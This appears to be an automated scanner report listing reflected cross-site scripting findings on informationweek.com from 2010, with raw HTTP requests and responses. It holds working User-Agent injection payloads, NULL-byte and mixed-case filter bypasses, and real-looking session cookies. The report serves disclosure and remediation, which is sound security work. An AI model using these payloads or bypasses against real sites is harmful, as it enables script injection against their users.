The value of the User-Agent HTTP header is copied into a JavaScript string literal enclosed in double quotation marks. The payload 4212f"-alert(1)-"f2aea13f6fd was submitted in the User-Agent HTTP header and was echoed unmodified in the application's response: the double quotation mark in the payload closes the string literal, and the remainder of the payload is parsed as JavaScript.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the data copied into the response is submitted in a request header, the application's behaviour is not trivial to exploit in an attack against another user: a cross-site request made from a victim's browser does not give the attacker control of the User-Agent header. Techniques have existed in the past, using client-side technologies such as Flash, for making another user's browser send a request carrying an arbitrary HTTP header; where such a technique is available, it can probably be leveraged to exploit this flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /news/storage/systems/showArticle.jhtml HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)4212f"-alert(1)-"f2aea13f6fd
Connection: close
Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 00:23:36 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sun, 12 Dec 2010 00:23:36 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 29883
<!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat ...[SNIP]... ; s.channel=""; s.pageType=""; s.prop1=""; s.prop2=""; s.prop3=""; s.prop4=""; s.prop5=""; s.prop6=""; s.prop7=""; s.prop8="174.121.222.18 | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)4212f"-alert(1)-"f2aea13f6fd"; s.prop9=""; s.prop10=""; s.prop11=""; s.prop12=""; s.prop14=""; s.prop15=""; s.prop16=""; s.prop19="False"; s.prop21="";
The value of the User-Agent HTTP header is copied into a JavaScript string literal enclosed in double quotation marks. The payload %001bbc7"-alert(1)-"9835e874fef was submitted in the User-Agent HTTP header and was echoed as 1bbc7"-alert(1)-"9835e874fef in the application's response: the double quotation mark in the payload closes the string literal, and the remainder of the payload is parsed as JavaScript.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application (or a filter in front of it) attempts to block certain characters that are often used in XSS attacks, but the block can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the blocked characters.
Because the data copied into the response is submitted in a request header, the application's behaviour is not trivial to exploit in an attack against another user: a cross-site request made from a victim's browser does not give the attacker control of the User-Agent header. Techniques have existed in the past, using client-side technologies such as Flash, for making another user's browser send a request carrying an arbitrary HTTP header; where such a technique is available, it can probably be leveraged to exploit this flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /newsletters/subscribe.jhtml HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)%001bbc7"-alert(1)-"9835e874fef
Connection: close
Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 00:23:00 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sun, 12 Dec 2010 00:23:00 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 84564
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><ti ...[SNIP]... s.channel=""; s.pageType=""; s.prop1=""; s.prop2=""; s.prop3=""; s.prop4=""; s.prop5=""; s.prop6=""; s.prop7=""; s.prop8="174.121.222.18 | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)%001bbc7"-alert(1)-"9835e874fef"; s.prop9=""; s.prop10=""; s.prop11=""; s.prop12=""; s.prop14=""; s.prop15=""; s.prop16=""; s.prop19="False"; s.prop21="";
The value of the User-Agent HTTP header is copied into a JavaScript string literal enclosed in double quotation marks. The payload 485a4"-alert(1)-"0580e8b2170 was submitted in the User-Agent HTTP header and was echoed unmodified in the application's response: the double quotation mark in the payload closes the string literal, and the remainder of the payload is parsed as JavaScript.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. The redirection must be followed for the attack to succeed; a browser follows it automatically.
Because the data copied into the response is submitted in a request header, the application's behaviour is not trivial to exploit in an attack against another user: a cross-site request made from a victim's browser does not give the attacker control of the User-Agent header. Techniques have existed in the past, using client-side technologies such as Flash, for making another user's browser send a request carrying an arbitrary HTTP header; where such a technique is available, it can probably be leveraged to exploit this flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /take.jhtml HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: 485a4"-alert(1)-"0580e8b2170
Connection: close
Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response (redirected)
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 00:22:54 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sun, 12 Dec 2010 00:22:54 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 52249
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 632db"-alert(1)-"be9159c7c5c was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/security/21090964001 HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: 632db"-alert(1)-"be9159c7c5c
Connection: close
Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response (redirected)
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 00:21:40 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sun, 12 Dec 2010 00:21:40 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 68332
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload %00abe0d"-alert(1)-"21ff2ee9e6 was submitted in the User-Agent HTTP header. This input was echoed as abe0d"-alert(1)-"21ff2ee9e6 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /video/security/37740285001 HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)%00abe0d"-alert(1)-"21ff2ee9e6
Connection: close
Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 00:21:59 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sun, 12 Dec 2010 00:21:59 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 68003
<!--<DROPLET SRC="combinexy.jhtml">--> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xh ...[SNIP]... s.channel=""; s.pageType=""; s.prop1=""; s.prop2=""; s.prop3=""; s.prop4=""; s.prop5=""; s.prop6=""; s.prop7=""; s.prop8="174.121.222.18 | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)%00abe0d"-alert(1)-"21ff2ee9e6"; s.prop9=""; s.prop10=""; s.prop11=""; s.prop12=""; s.prop14=""; s.prop15=""; s.prop16=""; s.prop19="False"; s.prop21="";
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 343b0"-alert(1)-"30dbea6ae52 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/security/42988833001 HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)343b0"-alert(1)-"30dbea6ae52
Connection: close
Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 00:21:35 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sun, 12 Dec 2010 00:21:35 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 68465
<!--<DROPLET SRC="combinexy.jhtml">--> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xh ...[SNIP]... ; s.channel=""; s.pageType=""; s.prop1=""; s.prop2=""; s.prop3=""; s.prop4=""; s.prop5=""; s.prop6=""; s.prop7=""; s.prop8="174.121.222.18 | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)343b0"-alert(1)-"30dbea6ae52"; s.prop9=""; s.prop10=""; s.prop11=""; s.prop12=""; s.prop14=""; s.prop15=""; s.prop16=""; s.prop19="False"; s.prop21="";
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload %009ddce</script><script>alert(1)</script>f40c3391b78 was submitted in the User-Agent HTTP header. This input was echoed as 9ddce</script><script>alert(1)</script>f40c3391b78 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /video/security/68553969001 HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: %009ddce</script><script>alert(1)</script>f40c3391b78
Connection: close
Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 00:21:19 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sun, 12 Dec 2010 00:21:19 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 68175
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f4941"-alert(1)-"cbb82246eab was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /whitepaper HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: f4941"-alert(1)-"cbb82246eab
Connection: close
Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response (redirected)
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 00:21:24 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sun, 12 Dec 2010 00:21:24 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 70393
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload %0045705</script><ScRiPt>alert(1)</ScRiPt>d1fd8d17d23 was submitted in the User-Agent HTTP header. This input was echoed as 45705</script><ScRiPt>alert(1)</ScRiPt>d1fd8d17d23 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass. Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.
Request
GET /whitepaper/ HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)%0045705</script><ScRiPt>alert(1)</ScRiPt>d1fd8d17d23
Connection: close
Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 00:23:26 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sun, 12 Dec 2010 00:23:26 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 70414
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><m ...[SNIP]... s.channel=""; s.pageType=""; s.prop1=""; s.prop2=""; s.prop3=""; s.prop4=""; s.prop5=""; s.prop6=""; s.prop7=""; s.prop8="174.121.222.18 | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)%0045705</script><ScRiPt>alert(1)</ScRiPt>d1fd8d17d23"; s.prop9=""; s.prop10=""; s.prop11=""; s.prop12=""; s.prop14=""; s.prop15=""; s.prop16=""; s.prop19="False"; s.prop21="";
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8975f"-alert(1)-"4f852489aac was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /whitepaper/Security HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)8975f"-alert(1)-"4f852489aac
Connection: close
Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 00:23:22 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sun, 12 Dec 2010 00:23:22 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 94163
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><m ...[SNIP]... ; s.channel=""; s.pageType=""; s.prop1=""; s.prop2=""; s.prop3=""; s.prop4=""; s.prop5=""; s.prop6=""; s.prop7=""; s.prop8="174.121.222.18 | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)8975f"-alert(1)-"4f852489aac"; s.prop9=""; s.prop10=""; s.prop11=""; s.prop12=""; s.prop14=""; s.prop15=""; s.prop16=""; s.prop19="False"; s.prop21="";
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ea2ae"-alert(1)-"3fe6567e43a was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /whitepaper/Security/Attacks-Breaches/secure-managed-web-hosting-saves-960-gs-from-mali-wp1289321032460 HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: ea2ae"-alert(1)-"3fe6567e43a
Connection: close
Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 00:22:28 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sun, 12 Dec 2010 00:22:28 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 62112
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload %0045a6d</script><script>alert(1)</script>894561d47b0 was submitted in the User-Agent HTTP header. This input was echoed as 45a6d</script><script>alert(1)</script>894561d47b0 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /whitepaper/Security/Attacks-Breaches/the-compliance-trap-compliance-for-compliance-s--wp1289426272525 HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: %0045a6d</script><script>alert(1)</script>894561d47b0
Connection: close
Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 00:22:39 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sun, 12 Dec 2010 00:22:39 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 62872
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fd212</script>d0389d5d785 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to close the open <SCRIPT> tag and return to a plain text context. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /whitepaper/Security/Attacks-Breaches/what-is-security-as-a-service-and-should-smbs-co-wp1289497389050 HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)fd212</script>d0389d5d785
Connection: close
